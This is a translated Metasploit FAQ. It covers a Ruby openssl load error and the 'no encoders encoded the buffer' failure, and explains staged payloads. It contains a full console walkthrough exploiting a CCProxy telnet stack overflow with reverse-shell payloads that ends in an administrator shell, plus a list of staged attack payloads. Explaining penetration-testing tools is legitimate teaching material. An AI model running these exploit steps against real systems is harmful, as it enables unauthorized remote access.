Metasploit/常見問題解答
問:第一次執行 Metasploit 時,出現以下錯誤:沒有找到此檔案 - openssl (LoadError)
- 示例
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
from ./lib/rex/socket/ssl_tcp_server.rb:4
from ./lib/rex/socket/comm/local.rb:5:in `require'
from ./lib/rex/socket/comm/local.rb:5
from ./lib/rex/socket.rb:22:in `require'
from ./lib/rex/socket.rb:22
from ./lib/rex.rb:71:in `require'
from ./lib/rex.rb:71
from ./msfgui:10:in `require'
from ./msfgui:10
答:Metasploit 需要 Ruby 實現的 openssl,而不是 Apache 等使用的標準 C 實現的 openssl。安裝相關的 ruby-openssl 庫。
- 示例(適用於 Debian - 檢查您的作業系統或嘗試使用 gem)
pwebster@metasploit:~$ apt-cache search ruby | grep openssl libopenssl-ruby - OpenSSL interface for Ruby libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8 libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9 pwebster@metasploit:~# apt-get install libopenssl-ruby
問:在為漏洞利用模組設定所有必需的引數並執行 exploit 後,我收到以下錯誤:[-] 漏洞利用失敗:沒有編碼器成功編碼緩衝區。
- 示例
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info
Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
Version: $Revision$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
Patrick Webster <patrick [at] aushack.com>
Available targets:
Id Name
-- ----
0 Windows 2000 Pro SP0 - English
1 Windows 2000 Pro SP1 - English
2 Windows 2000 Pro SP2 - English
3 Windows 2000 Pro SP3 - English
4 Windows 2000 Pro SP4 - English
5 Windows XP SP0/1 - English
6 Windows 2003 Server SP0/1 - English
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 127.0.0.1 yes The target address
RPORT 23 yes The target port
Payload information:
Space: 200
Avoid: 5 characters
Description:
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet
service. The stack is overwritten when sending an overly long
address to the 'ping' command.
msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
答:可用的有效負載(show payloads)取決於漏洞利用可用的記憶體“空間”。在上面的示例中,有效負載空間為:“空間:200”。但是,目標應用程式不允許使用某些字元(通常是空字元 0x00,因為它表示字串(字元陣列)的結束)。在本例中,有效負載不允許五個字元:“避免:5 個字元”
執行漏洞利用時,有效負載生成器將嘗試將您所需的有效負載放入 200 個空間中,該空間不包含 5 個特定字元。這並不總是可能的,會導致以下錯誤:沒有編碼器成功編碼緩衝區。
但是,一切並非沒有希望。Metasploit 框架包括支援分段有效負載的能力。分段有效負載是一個明顯更小的有效負載,它不會執行您所需的行動(例如反向 shell),而是啟動一個分段平臺,然後可以新增到該平臺。因此,在本例中,它不會是一個完整的反向 shell,而是會
- 建立分段平臺。
- 分配足夠的空間來儲存您所需的有效負載。
- 從您那裡獲取有效負載的其餘部分。
- 將有效負載作為一個整體執行。
通常,所有分段漏洞利用都由所需有效負載後的“/”表示。以下是一些示例
windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager windows/exec/find_tag Windows Execute Command, Find Tag Ordinal Stager windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager
因此,既然我們知道它不能容納“內聯”有效負載,我們就可以使用分段器來代替
... msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ccproxy_telnet_ping) > exploit [*] Started reverse handler [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23... [*] Sending stage (474 bytes) [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\Documents and Settings\Administrator>